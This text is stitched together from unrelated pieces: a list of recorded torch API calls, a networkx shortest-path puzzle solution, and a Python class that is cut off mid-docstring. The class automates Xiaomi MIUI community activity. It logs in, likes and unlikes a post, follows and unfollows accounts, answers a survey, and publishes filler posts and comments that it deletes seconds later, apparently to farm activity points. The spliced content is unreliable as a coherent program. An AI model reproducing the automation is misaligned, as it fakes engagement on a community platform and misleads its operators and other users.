[((3246, 3269), 'torch.nn.Sequential', 'nn.Sequential', (['*modules'], {}), '(*modules)\n', (3259, 3269), True, 'import torch.nn as nn\n'), ((3899, 4030), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_nc', 'out_nc'], {'kernel_size': 'kernel_size', 'stride': 'stride', 'padding': 'padding', 'dilation': 'dilation', 'bias': 'bias', 'groups': 'groups'}), '(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=\n padding, dilation=dilation, bias=bias, groups=groups)\n', (3908, 4030), True, 'import torch.nn as nn\n'), ((9283, 9314), 'torch.nn.PixelShuffle', 'nn.PixelShuffle', (['upscale_factor'], {}), '(upscale_factor)\n', (9298, 9314), True, 'import torch.nn as nn\n'), ((9730, 9781), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': 'upscale_factor', 'mode': 'mode'}), '(scale_factor=upscale_factor, mode=mode)\n', (9741, 9781), True, 'import torch.nn as nn\n'), ((461, 477), 'torch.nn.ReLU', 'nn.ReLU', (['inplace'], {}), '(inplace)\n', (468, 477), True, 'import torch.nn as nn\n'), ((915, 946), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['nc'], {'affine': '(True)'}), '(nc, affine=True)\n', (929, 946), True, 'import torch.nn as nn\n'), ((1379, 1406), 'torch.nn.ReflectionPad2d', 'nn.ReflectionPad2d', (['padding'], {}), '(padding)\n', (1397, 1406), True, 'import torch.nn as nn\n'), ((14261, 14284), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (14273, 14284), True, 'import torch.nn as nn\n'), ((20941, 20960), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (20953, 20960), False, 'import torch\n'), ((22149, 22168), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (22161, 22168), False, 'import torch\n'), ((22245, 22290), 'torchvision.models.resnet101', 'torchvision.models.resnet101', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (22273, 22290), False, 'import torchvision\n'), ((23222, 23235), 'torch.nn.ReLU', 'nn.ReLU', (['(True)'], {}), '(True)\n', (23229, 23235), True, 'import torch.nn as nn\n'), ((23258, 23283), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3)', '(1)', '(1)'], {}), '(3, 64, 3, 1, 1)\n', (23267, 23283), True, 'import torch.nn as nn\n'), ((23306, 23332), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)', '(1)', '(1)'], {}), '(64, 64, 3, 1, 1)\n', (23315, 23332), True, 'import torch.nn as nn\n'), ((23357, 23409), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23369, 23409), True, 'import torch.nn as nn\n'), ((23432, 23459), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3)', '(1)', '(1)'], {}), '(64, 128, 3, 1, 1)\n', (23441, 23459), True, 'import torch.nn as nn\n'), ((23482, 23510), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(3)', '(1)', '(1)'], {}), '(128, 128, 3, 1, 1)\n', (23491, 23510), True, 'import torch.nn as nn\n'), ((23535, 23587), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23547, 23587), True, 'import torch.nn as nn\n'), ((23610, 23638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3)', '(1)', '(1)'], {}), '(128, 256, 3, 1, 1)\n', (23619, 23638), True, 'import torch.nn as nn\n'), ((23661, 23689), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3)', '(1)', '(1)'], {}), '(256, 256, 3, 1, 1)\n', (23670, 23689), True, 'import torch.nn as nn\n'), ((23712, 23740), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3)', '(1)', 
'(1)'], {}), '(256, 256, 3, 1, 1)\n', (23721, 23740), True, 'import torch.nn as nn\n'), ((23765, 23817), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (23777, 23817), True, 'import torch.nn as nn\n'), ((23840, 23868), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3)', '(1)', '(1)'], {}), '(256, 512, 3, 1, 1)\n', (23849, 23868), True, 'import torch.nn as nn\n'), ((23891, 23919), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (23900, 23919), True, 'import torch.nn as nn\n'), ((23942, 23970), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (23951, 23970), True, 'import torch.nn as nn\n'), ((23995, 24047), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {'stride': '(2)', 'padding': '(0)', 'ceil_mode': '(True)'}), '(2, stride=2, padding=0, ceil_mode=True)\n', (24007, 24047), True, 'import torch.nn as nn\n'), ((24070, 24098), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24079, 24098), True, 'import torch.nn as nn\n'), ((24121, 24149), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24130, 24149), True, 'import torch.nn as nn\n'), ((24172, 24200), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (24181, 24200), True, 'import torch.nn as nn\n'), ((25086, 25105), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (25098, 25105), False, 'import torch\n'), ((528, 560), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['neg_slope', 'inplace'], {}), '(neg_slope, inplace)\n', (540, 560), True, 'import torch.nn as nn\n'), ((997, 1032), 'torch.nn.InstanceNorm2d', 'nn.InstanceNorm2d', (['nc'], {'affine': '(False)'}), '(nc, affine=False)\n', (1014, 1032), True, 'import torch.nn as nn\n'), ((1457, 1485), 'torch.nn.ReplicationPad2d', 'nn.ReplicationPad2d', (['padding'], {}), '(padding)\n', (1476, 1485), True, 'import torch.nn as nn\n'), ((7598, 7619), 'torch.cat', 'torch.cat', (['(x, x1)', '(1)'], {}), '((x, x1), 1)\n', (7607, 7619), False, 'import torch\n'), ((7645, 7670), 'torch.cat', 'torch.cat', (['(x, x1, x2)', '(1)'], {}), '((x, x1, x2), 1)\n', (7654, 7670), False, 'import torch\n'), ((7696, 7725), 'torch.cat', 'torch.cat', (['(x, x1, x2, x3)', '(1)'], {}), '((x, x1, x2, x3), 1)\n', (7705, 7725), False, 'import torch\n'), ((7751, 7784), 'torch.cat', 'torch.cat', (['(x, x1, x2, x3, x4)', '(1)'], {}), '((x, x1, x2, x3, x4), 1)\n', (7760, 7784), False, 'import torch\n'), ((10235, 10255), 'math.log', 'math.log', (['upscale', '(2)'], {}), '(upscale, 2)\n', (10243, 10255), False, 'import math\n'), ((13775, 13802), 'torch.nn.Linear', 'nn.Linear', (['(512 * 4 * 4)', '(100)'], {}), '(512 * 4 * 4, 100)\n', (13784, 13802), True, 'import torch.nn as nn\n'), ((13804, 13827), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (13816, 13827), True, 'import torch.nn as nn\n'), ((13829, 13846), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (13838, 13846), True, 'import torch.nn as nn\n'), ((14321, 14346), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3)', '(1)', '(1)'], {}), '(3, 64, 3, 1, 1)\n', (14330, 14346), True, 'import torch.nn as nn\n'), ((14383, 14409), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(4)', '(2)', '(1)'], {}), '(64, 64, 4, 2, 1)\n', 
(14392, 14409), True, 'import torch.nn as nn\n'), ((14463, 14490), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3)', '(1)', '(1)'], {}), '(64, 128, 3, 1, 1)\n', (14472, 14490), True, 'import torch.nn as nn\n'), ((14527, 14555), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(4)', '(2)', '(1)'], {}), '(128, 128, 4, 2, 1)\n', (14536, 14555), True, 'import torch.nn as nn\n'), ((14610, 14638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3)', '(1)', '(1)'], {}), '(128, 256, 3, 1, 1)\n', (14619, 14638), True, 'import torch.nn as nn\n'), ((14675, 14703), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(4)', '(2)', '(1)'], {}), '(256, 256, 4, 2, 1)\n', (14684, 14703), True, 'import torch.nn as nn\n'), ((14758, 14786), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3)', '(1)', '(1)'], {}), '(256, 512, 3, 1, 1)\n', (14767, 14786), True, 'import torch.nn as nn\n'), ((14823, 14851), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(4)', '(2)', '(1)'], {}), '(512, 512, 4, 2, 1)\n', (14832, 14851), True, 'import torch.nn as nn\n'), ((14905, 14933), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3)', '(1)', '(1)'], {}), '(512, 512, 3, 1, 1)\n', (14914, 14933), True, 'import torch.nn as nn\n'), ((14970, 14998), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(4)', '(2)', '(1)'], {}), '(512, 512, 4, 2, 1)\n', (14979, 14998), True, 'import torch.nn as nn\n'), ((15076, 15103), 'torch.nn.Linear', 'nn.Linear', (['(512 * 4 * 4)', '(100)'], {}), '(512 * 4 * 4, 100)\n', (15085, 15103), True, 'import torch.nn as nn\n'), ((15142, 15159), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (15151, 15159), True, 'import torch.nn as nn\n'), ((17781, 17808), 'torch.nn.Linear', 'nn.Linear', (['(512 * 3 * 3)', '(100)'], {}), '(512 * 3 * 3, 100)\n', (17790, 17808), True, 'import torch.nn as nn\n'), ((17810, 17833), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (17822, 17833), True, 'import torch.nn as nn\n'), ((17835, 17852), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (17844, 17852), True, 'import torch.nn as nn\n'), ((20443, 20470), 'torch.nn.Linear', 'nn.Linear', (['(512 * 3 * 3)', '(100)'], {}), '(512 * 3 * 3, 100)\n', (20452, 20470), True, 'import torch.nn as nn\n'), ((20472, 20495), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.2)', '(True)'], {}), '(0.2, True)\n', (20484, 20495), True, 'import torch.nn as nn\n'), ((20497, 20514), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (20506, 20514), True, 'import torch.nn as nn\n'), ((21054, 21098), 'torchvision.models.vgg19_bn', 'torchvision.models.vgg19_bn', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (21081, 21098), False, 'import torchvision\n'), ((21133, 21174), 'torchvision.models.vgg19', 'torchvision.models.vgg19', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (21157, 21174), False, 'import torchvision\n'), ((25251, 25314), 'torch.load', 'torch.load', (['"""../experiments/pretrained_models/VGG16minc_53.pth"""'], {}), "('../experiments/pretrained_models/VGG16minc_53.pth')\n", (25261, 25314), False, 'import torch\n'), ((607, 655), 'torch.nn.PReLU', 'nn.PReLU', ([], {'num_parameters': 'n_prelu', 'init': 'neg_slope'}), '(num_parameters=n_prelu, init=neg_slope)\n', (615, 655), True, 'import torch.nn as nn\n'), ((21271, 21306), 'torch.Tensor', 'torch.Tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (21283, 21306), False, 'import torch\n'), ((21420, 21455), 'torch.Tensor', 
'torch.Tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (21432, 21455), False, 'import torch\n'), ((22387, 22422), 'torch.Tensor', 'torch.Tensor', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (22399, 22422), False, 'import torch\n'), ((22536, 22571), 'torch.Tensor', 'torch.Tensor', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (22548, 22571), False, 'import torch\n')]
|
import os
import networkx as nx
def add_n_mat(mat, n):
new_mat = []
for l in mat:
new_mat.append(list(map(lambda x: ((x + n - 1) % 9) + 1, l)))
return new_mat
def add_n_list(l, n):
return list(map(lambda x: ((x + n - 1) % 9) + 1, l))
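# Values wrap within 1..9: adding n maps 9 -> 1 when n == 1, 9 -> 2 when
# n == 2, and so on, which is how the grid is tiled out to 5x its original
# size below.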
cwd = os.getcwd()
with open(f"{cwd}/input.txt") as f:
data = [[int(c) for c in l] for l in f.read().splitlines()]
orig_data = data[:]
for i in range(4):
data += add_n_mat(orig_data, i + 1)
aux = []
for l in data:
aux.append(l[:])
for i in range(4):
for j, l in enumerate(data):
l.extend(add_n_list(aux[j], i + 1))
g = nx.DiGraph()
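# Each directed edge points *into* cell (i, j) and is weighted by that cell's
# value, so a shortest path from (0, 0) accumulates the value of every cell
# entered along the way (the starting cell itself is never counted).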
for i, l in enumerate(data):
for j, n in enumerate(l):
if i < len(data) - 1:
g.add_edge((i + 1, j), (i, j), weight=n)
if i > 0:
g.add_edge((i - 1, j), (i, j), weight=n)
if j < len(l) - 1:
g.add_edge((i, j + 1), (i, j), weight=n)
if j > 0:
g.add_edge((i, j - 1), (i, j), weight=n)
print(nx.shortest_path_length(g, (0, 0), (len(data) - 1, len(data[0]) - 1), "weight"))
|
[
"os.getcwd",
"networkx.DiGraph"
] |
[((252, 263), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (261, 263), False, 'import os\n'), ((572, 584), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (582, 584), True, 'import networkx as nx\n')]
|
# -- coding:UTF-8 --
import requests
import time
import json
import hashlib
from urllib import request
from http import cookiejar
from utils.utils import system_info, get_config, w_log, s_log, check_config, format_config
class MIUITask:
def __init__(self, uid, password, user_agent, board_id, device_id):
self.uid = uid
self.password = password
self.user_agent = user_agent
self.board_id = board_id
self.device_id = device_id
        # populated after login
        self.cookie = ''
        # populated after login
        self.miui_vip_ph = ''
def thumb_up(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/thumbUp?postId=28270729',
headers=headers)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Thumb-up failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Thumb-up failed: " + str(r_json['message']))
            w_log("Thumb-up succeeded")
        except Exception as e:
            w_log("Thumb-up raised an error")
w_log(e)
def cancel_thumb_up(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/cancelThumbUp?postId=28270729',
headers=headers)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Cancel thumb-up failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Cancel thumb-up failed: " + str(r_json['message']))
            w_log("Cancel thumb-up succeeded")
        except Exception as e:
            w_log("Cancel thumb-up raised an error")
w_log(e)
def delete_post(self, tid):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/post/detail/delete?postId=' + str(tid),
headers=headers)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Delete post failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Delete post failed: " + str(r_json['message']))
            w_log("Delete post succeeded: " + str(r_json['message']))
        except Exception as e:
            w_log("Delete post raised an error; please delete it manually")
w_log(e)
    # Build the request signature for a post
def post_sign(self,data):
s_data = []
for d in data:
s_data.append(str(d) + '=' + str(data[d]))
s_str = '&'.join(s_data)
        w_log('Sign input: ' + str(s_str))
        s_str = hashlib.md5(str(s_str).encode(encoding='UTF-8')).hexdigest() + '067f0q5wds4'
        s_sign = hashlib.md5(str(s_str).encode(encoding='UTF-8')).hexdigest()
        w_log('Sign result: ' + str(s_sign))
return s_sign, data['timestamp']
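    # Worked example of the scheme above (illustrative values only):
    #   data = {'postId': '1', 'text': 'hi', 'timestamp': 1620000000000}
    #   -> s_str  = 'postId=1&text=hi&timestamp=1620000000000'
    #   -> md5(s_str) + '067f0q5wds4' is hashed again to produce the final sign.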
    # Publish an announce post
def new_announce(self, t_type):
headers = {
'cookie': str(self.cookie)
}
sign_data = {
'announce': '{"textContent":"ๅฐ็ฑณ็คพๅบ็ฝๅฑ","boards":[{"boardId":"' + self.board_id + '"}],"announceType":"' + str(t_type) + '","extraStatus":1,"extraA":"","extraB":null}',
'timestamp': int(round(time.time() * 1000))
}
sign = self.post_sign(sign_data)
data = {
'announce': sign_data['announce'],
'pageType': '1',
'miui_vip_ph': str(self.miui_vip_ph),
'sign': sign[0],
'timestamp': sign[1]
}
try:
response = requests.post('https://api.vip.miui.com/api/community/post/add/newAnnounce', headers=headers,
data=data)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Publish post failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Publish post failed: " + str(r_json['message']))
            post_entity = json.loads(r_json['entity'])
            w_log("Publish post succeeded, post ID: " + str(post_entity['announceId']) + "; it will be deleted in 3 seconds")
            self.add_comment_return_comment_info(str(post_entity['announceId']))
            time.sleep(3)
            # Delete five times to guard against a failed deletion
            for item in range(0, 5):
                self.delete_post(post_entity['announceId'])
        except Exception as e:
            w_log("Publish post raised an error")
            w_log(e)
    # Post a comment and return its info
def add_comment_return_comment_info(self, tid):
headers = {
'cookie': str(self.cookie)
}
post_text = 'ๅฐ็ฑณ็คพๅบ็ฝๅฑ'
sign_data = {
'postId': str(tid),
'text': post_text,
'timestamp': int(round(time.time() * 1000))
}
sign = self.post_sign(sign_data)
data = {
'postId': str(tid),
'text': post_text,
'miui_vip_ph': str(self.miui_vip_ph),
'sign': sign[0],
'timestamp': sign[1]
}
try:
response = requests.post('https://api.vip.miui.com/mtop/planet/vip/content/addCommentReturnCommentInfo',
headers=headers, data=data)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Reply failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Reply failed: " + str(r_json['message']))
            w_log("Reply succeeded")
        except Exception as e:
            w_log("Reply raised an error")
w_log(e)
def get_vip_cookie(self, url):
try:
r_cookie = cookiejar.CookieJar()
handler = request.HTTPCookieProcessor(r_cookie)
opener = request.build_opener(handler)
response = opener.open(url)
for item in r_cookie:
self.cookie += item.name + '=' + item.value + ';'
if self.cookie == '':
return False
ck_list = self.cookie.replace(" ", "").split(';')
for ph in ck_list:
if "miui_vip_ph=" in ph:
self.miui_vip_ph = ph.replace("miui_vip_ph=", "")
break
return True
except Exception as e:
w_log(e)
return False
    # Submit the satisfaction survey
def submit_survey(self, sid):
headers = {
'cookie': str(self.cookie)
}
data = {
'survey': '{"surveyId":' + str(sid) + ',"answer":{"1":"A"}}',
'businessId': '2',
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/miui/dev/survey/submit', headers=headers, data=data)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Survey vote failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Survey vote failed: " + str(r_json['message']))
            w_log("Survey vote succeeded")
        except Exception as e:
            w_log("Survey vote raised an error")
w_log(e)
    # Fetch the satisfaction-survey ID
def get_survey_id(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/miui/dev/survey?businessId=2', headers=headers)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Fetching survey ID failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Fetching survey ID failed: " + str(r_json['message']))
            elif r_json['entity']['surveyInfo']['surveyId'] is None:
                w_log("Fetching survey ID failed: survey ID is empty")
            survey_id = r_json['entity']['surveyInfo']['surveyId']
            w_log("Fetched survey ID: " + str(survey_id))
            self.submit_survey(survey_id)
        except Exception as e:
            w_log("Fetching survey ID raised an error; survey vote failed")
w_log(e)
    # Unfollow a user
def unfollow_user(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/user/relation/unfollow?followeeId=210836962',
headers=headers)
r_json = response.json()
            if r_json['code'] == 401:
                return w_log("Unfollow user failed: cookie is invalid")
            elif r_json['code'] != 200:
                return w_log("Unfollow user failed: " + str(r_json['message']))
            w_log("Unfollow user succeeded")
        except Exception as e:
            w_log("Unfollow user raised an error")
w_log(e)
    # Follow a user
def follow_user(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/user/relation/follow?followeeId=210836962',
headers=headers)
rJson = response.json()
if rJson['code'] == 401:
return w_log("ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif rJson['code'] != 200:
return w_log("ๅ
ณๆณจ็จๆทๅคฑ่ดฅ๏ผ" + str(rJson['message']))
w_log("ๅ
ณๆณจ็จๆทๆๅ")
except Exception as e:
w_log("ๅ
ณๆณจ็จๆทๅบ้")
w_log(e)
# ้ๅบๅๅญ
def unfollow_board(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/board/unfollow?boardId=5462662',
headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("้ๅบๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("้ๅบๅๅญๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("้ๅบๅๅญๆๅ")
except Exception as e:
w_log("้ๅบๅๅญๅบ้")
w_log(e)
    # ๅ ๅฅๅๅญ
def follow_board(self):
headers = {
'cookie': str(self.cookie)
}
try:
response = requests.get('https://api.vip.miui.com/api/community/board/follow?boardId=5462662', headers=headers)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅ ๅ
ฅๅๅญๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅ ๅ
ฅๅๅญๆๅ")
except Exception as e:
w_log("ๅ ๅ
ฅๅๅญๅบ้")
# ๆดป่ทๅบฆไปปๅก้ขๅ
def start_task(self, task_id):
headers = {
'cookie': str(self.cookie)
}
data = {
'taskId': str(task_id),
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/community/user/task/start?version=dev.210805',
headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("ๅผๅงๆดป่ทๅไปปๅกๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("ๅผๅงๆดป่ทๅไปปๅกๆๅ")
except Exception as e:
w_log("ๅผๅงๆดป่ทๅไปปๅกๅบ้")
w_log(e)
# ๆดป่ทๅบฆไปปๅกๅฎๆ
def acquire_task(self, task_id):
headers = {
'cookie': str(self.cookie)
}
data = {
'taskId': str(task_id),
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/community/user/task/acquire?version=dev.210805',
headers=headers, data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("้ขๅๆดป่ทๅๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("้ขๅๆดป่ทๅๆๅ")
except Exception as e:
w_log("้ขๅๆดป่ทๅๅบ้")
w_log(e)
# ็คพๅบๆ่ๅ็ญพๅฐ
def vip_check_in(self):
headers = {
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'cookie': str(self.cookie)
}
data = {
'miui_vip_ph': str(self.miui_vip_ph)
}
try:
response = requests.post('https://api.vip.miui.com/api/carrot/pull', headers=headers,
data=data)
r_json = response.json()
if r_json['code'] == 401:
return w_log("็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผCookieๆ ๆ")
elif r_json['code'] != 200:
return w_log("็คพๅบๆ่ๅ็ญพๅฐๅคฑ่ดฅ๏ผ" + str(r_json['message']))
w_log("็คพๅบๆ่ๅ็ญพๅฐๆๅ")
except Exception as e:
w_log("็คพๅบๆ่ๅ็ญพๅฐๅบ้")
w_log(e)
def mi_login(self):
proxies = {
'https': None,
'http': None
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://account.xiaomi.com/fe/service/login/password?sid=miui_vip&qs=%253Fcallback%253Dhttp'
'%25253A%25252F%25252Fapi.vip.miui.com%25252Fsts%25253Fsign%25253D4II4ABwZkiJzkd2YSkyEZukI4Ak'
'%2525253D%252526followup%25253Dhttps%2525253A%2525252F%2525252Fapi.vip.miui.com%2525252Fpage'
'%2525252Flogin%2525253FdestUrl%2525253Dhttps%252525253A%252525252F%252525252Fweb.vip.miui.com'
'%252525252Fpage%252525252Finfo%252525252Fmio%252525252Fmio%252525252FinternalTest%252525253Fref'
'%252525253Dhomepage%2526sid%253Dmiui_vip&callback=http%3A%2F%2Fapi.vip.miui.com%2Fsts%3Fsign'
'%3D4II4ABwZkiJzkd2YSkyEZukI4Ak%253D%26followup%3Dhttps%253A%252F%252Fapi.vip.miui.com%252Fpage'
'%252Flogin%253FdestUrl%253Dhttps%25253A%25252F%25252Fweb.vip.miui.com%25252Fpage%25252Finfo'
'%25252Fmio%25252Fmio%25252FinternalTest%25253Fref%25253Dhomepage&_sign=L%2BdSQY6sjSQ%2FCRjJs4p'
'%2BU1vNYLY%3D&serviceParam=%7B%22checkSafePhone%22%3Afalse%2C%22checkSafeAddress%22%3Afalse%2C'
'%22lsrp_score%22%3A0.0%7D&showActiveX=false&theme=&needTheme=false&bizDeviceType=',
'User-Agent': str(self.user_agent),
'Origin': 'https://account.xiaomi.com',
'X-Requested-With': 'XMLHttpRequest',
'Cookie': 'deviceId=' + str(self.device_id) + '; pass_ua=web; uLocale=zh_CN'
}
data = {
'bizDeviceType': '',
'needTheme': 'false',
'theme': '',
'showActiveX': 'false',
'serviceParam': '{"checkSafePhone":false,"checkSafeAddress":false,"lsrp_score":0.0}',
'callback': 'http://api.vip.miui.com/sts?sign=4II4ABwZkiJzkd2YSkyEZukI4Ak%3D&followup=https%3A%2F%2Fapi.vip'
'.miui.com%2Fpage%2Flogin%3FdestUrl%3Dhttps%253A%252F%252Fweb.vip.miui.com%252Fpage%252Finfo'
'%252Fmio%252Fmio%252FinternalTest%253Fref%253Dhomepage',
'qs': '%3Fcallback%3Dhttp%253A%252F%252Fapi.vip.miui.com%252Fsts%253Fsign%253D4II4ABwZkiJzkd2YSkyEZukI4Ak'
'%25253D%2526followup%253Dhttps%25253A%25252F%25252Fapi.vip.miui.com%25252Fpage%25252Flogin'
'%25253FdestUrl%25253Dhttps%2525253A%2525252F%2525252Fweb.vip.miui.com%2525252Fpage%2525252Finfo'
'%2525252Fmio%2525252Fmio%2525252FinternalTest%2525253Fref%2525253Dhomepage%26sid%3Dmiui_vip',
'sid': 'miui_vip',
'_sign': 'L+dSQY6sjSQ/CRjJs4p+U1vNYLY=',
'user': str(self.uid),
'cc': '+86',
'hash': str(self.password),
'_json': 'true'
}
try:
response = requests.post('https://account.xiaomi.com/pass/serviceLoginAuth2', headers=headers, data=data,
proxies=proxies)
response_data = response.text.lstrip('&').lstrip('START').lstrip('&')
r_json = json.loads(response_data)
if r_json['code'] == 70016:
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ็จๆทๅๆๅฏ็ ไธๆญฃ็กฎ')
return False
if r_json['code'] != 0:
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๅคฑ่ดฅ๏ผ' + r_json['desc'])
return False
if r_json['pwd'] != 1:
w_log('ๅฝๅ่ดฆๅท้่ฆ็ญไฟก้ช่ฏ็ ๏ผ่ฏทๅฐ่ฏไฟฎๆนUAๆ่ฎพๅคID')
return False
if not self.get_vip_cookie(r_json['location']):
w_log('ๅฐ็ฑณ่ดฆๅท็ปๅฝๆๅ๏ผ็คพๅบ่ทๅ Cookie ๅคฑ่ดฅ')
return False
w_log('่ดฆๅท็ปๅฝๅฎๆ')
return True
except Exception as e:
w_log("็ปๅฝๅฐ็ฑณ่ดฆๅทๅบ้")
w_log(e)
return False
def get_score(self) -> int:
"""
่ฟไธชๆนๆณๅธฆ่ฟๅๅผ็ๅๅ ๆฏ๏ผๅฏไปฅ่ฐ็จ่ฟไธชๆนๆณ่ทๅ่ฟๅๅผ๏ผๅฏๆ นๆฎ่ฟไธชๆนๆณๅฎๅถ่ชๅทฑ็โๆถๆฏๆ็คบๅ่ฝโใ
